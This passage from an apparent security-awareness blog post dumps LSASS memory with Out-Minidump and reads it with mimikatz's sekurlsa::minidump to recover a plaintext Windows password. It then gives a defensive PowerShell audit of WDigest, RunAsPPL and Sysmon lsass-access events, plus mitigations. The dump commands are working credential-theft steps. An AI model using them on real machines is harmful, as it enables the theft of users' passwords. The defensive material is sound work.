. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'   # "dot sourcing" method to import the function from the script
Get-Process lsass | Out-Minidump                                   # perform the LSASS dump
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'   # copy the dump file to the desired location
As you can see, lsass_868.dmp is the LSASS dump file captured with the PowerShell script. Now it's time to use the mimikatz console to load the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
mimikatz reports "Switching to MINIDUMP file", which means it is now reading credentials from the dump instead of the live process. Now run this command to display all the accounts and passwords available:
Tadaa… Now I can see my actual Microsoft Account username and password in plain text. As you can imagine, most people nowadays still use the same password for almost everything. Too bad… So, I expect you can picture all the consequences of this vulnerability…
The password is in fact encrypted in memory, but that encryption is useless here because the implementation depends on two basic Win32 functions: LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). Windows keeps the encrypted user password in memory rather than a one-way hash, so it can be decrypted back to plain text with LsaUnprotectMemory.
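To see whether your own machine is exposed in the way described above, here is an added defender-side audit script (my example, not code from the original post or from the Out-Minidump or mimikatz projects). It reads two real Windows registry settings and, assuming Sysmon is installed with ProcessAccess (Event ID 10) logging, lists recent processes that opened a handle to lsass.exe; run it from an elevated PowerShell prompt.

```powershell
function Get-LsassExposure {
    $wd  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # UseLogonCredential = 1 tells WDigest to keep a reversible copy of the
    # password in LSASS memory, which is exactly what the dump above exposes.
    # On Windows 8.1 / Server 2012 R2 and later a missing value means 0 (off).
    $useLogonCred = (Get-ItemProperty -Path $wd -Name UseLogonCredential `
        -ErrorAction SilentlyContinue).UseLogonCredential

    # RunAsPPL = 1 runs LSASS as a protected process, so an ordinary
    # administrator process cannot open it for reading and the dump step fails.
    $runAsPpl = (Get-ItemProperty -Path $lsa -Name RunAsPPL `
        -ErrorAction SilentlyContinue).RunAsPPL

    [pscustomobject]@{
        WDigestUseLogonCredential = $useLogonCred
        PlaintextInLsass          = ($useLogonCred -eq 1)
        LsaRunAsPPL               = $runAsPpl
        LsassProtected            = ($runAsPpl -eq 1)
    }
}

function Get-LsassAccessEvents {
    param([int]$Hours = 24)
    # Sysmon Event ID 10 records every handle opened to another process.
    # Any non-system SourceImage reaching lsass.exe deserves a closer look;
    # dump tools need at least PROCESS_VM_READ (0x10) in GrantedAccess.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10;
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
      ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        if ($d.TargetImage -like '*\lsass.exe') {
            [pscustomobject]@{
                Time          = $_.TimeCreated
                SourceImage   = $d.SourceImage
                GrantedAccess = $d.GrantedAccess
            }
        }
      }
}

Get-LsassExposure | Format-List
Get-LsassAccessEvents | Format-Table -AutoSize
```

If PlaintextInLsass is True or LsassProtected is False, the mitigations are to set UseLogonCredential to 0 and RunAsPPL to 1 respectively and reboot.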
You will be safe as long as you always lock your computer when you're away. This short article is just to remind me, and anyone else, to always be careful in whatever we do, especially with anything involving our passwords and personal credentials. No system is perfect! So, DON'T EVER LEAVE YOUR COMPUTER UNLOCKED!